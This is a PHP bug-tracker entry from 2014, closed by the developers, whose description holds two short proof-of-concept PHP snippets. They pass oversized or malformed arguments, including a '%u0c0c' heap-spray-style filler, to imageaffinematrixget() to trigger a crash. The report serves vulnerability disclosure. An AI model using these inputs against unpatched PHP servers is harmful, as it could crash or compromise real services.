|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2014-03-09 20:19 UTC] pajoye@php.net
[2014-03-09 20:19 UTC] pajoye@php.net
-Status: Open
+Status: Closed
[2014-03-10 11:45 UTC] ab@php.net
[2014-03-10 15:29 UTC] pajoye@php.net
[2014-03-10 15:30 UTC] pajoye@php.net
[2014-03-11 08:36 UTC] ab@php.net
[2014-04-10 04:47 UTC] tyrael@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Wed Oct 29 06:00:01 2025 UTC |
Description: ------------ <?php imageaffinematrixget(1, str_repeat('A', 2000)); ?> <?php $o = (object) str_repeat(urldecode("%u0c0c%u0c0c"), 2000); imageaffinematrixget(2, $o); ?>